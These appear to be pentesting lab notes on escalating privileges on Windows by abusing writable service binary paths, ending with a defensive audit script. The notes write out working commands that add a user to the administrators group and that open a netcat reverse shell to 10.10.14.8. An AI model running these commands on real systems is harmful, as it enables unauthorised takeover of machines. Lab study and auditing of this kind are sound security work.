Binary Paths

Overview

Every Windows service is configured with a binary path, the executable it runs. If we have the right permissions on the service (to change its configuration) or on the executable itself (write access), we can point the binary path at, or replace the executable with, a malicious one, which then runs with the service's privileges.

Exploitation via PowerShell

View services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions on a service binary (icacls output masks are explained in the table below)

icacls "C:\xampp\apache\bin\mysqld.exe"
Mask   Permissions
F      Full access
M      Modify access
RX     Read and execute access
R      Read-only access
W      Write-only access

Replace the service binary with a malicious one, then restart the service. Check the start mode first: if the service cannot be stopped and started directly, an automatic-start service will run the new binary after a reboot.

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
net stop mysql
net start mysql
shutdown /r /t 0

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks
[Screenshot: TCM Windows Priv Esc on Try Hack Me]

Change the binary path

sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" 

Start the service (the service name must match the one configured above)

sc.exe start daclsvc

Exploitation via Accesschk64

Check for services that low-privileged principals can write to (the accesschk EULA flag is -accepteula)

accesschk64.exe -accepteula -uwcv Everyone *
accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path works the same way as in the PowerUp method above (sc.exe config ... binpath=).
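Added audit example, not from the page or TCM's material: it enumerates services and flags any whose binary file grants write rights to low-privileged principals, which is the condition the icacls and accesschk checks above look for, so the ACLs can be tightened before they are abused. It assumes it is run as an administrator so every binary's ACL is readable.

```powershell
# Constructed audit script (assumption: run elevated so all service binary ACLs are readable).
# Flags service executables that low-privileged principals can modify or replace.

$lowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets a user alter the file or its ACL.
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    # Quoted path: the executable is the text between the first pair of quotes.
    if ($expanded -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted path: grow the candidate token by token until it names an existing file.
    $tokens = $expanded -split ' '
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $candidate = $tokens[0..$i] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $expanded
}

function Get-WeakBinaryAce {
    param([string]$Path)
    # Returns the first Allow ACE giving a low-privileged principal write rights, else $null.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) {
            return "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
        }
    }
    return $null
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $exe = Get-ServiceBinaryPath $_.PathName
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { return }
    $weak = Get-WeakBinaryAce $exe
    if ($weak) {
        [pscustomobject]@{ Service = $_.Name; StartMode = $_.StartMode; Binary = $exe; WeakAce = $weak }
    }
} | Format-Table -AutoSize
```

A flagged service is fixed by removing the offending ACE (for example icacls <binary> /remove <principal>) and by confirming with sc sdshow <service> that the same principals do not also hold change-config rights on the service itself.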
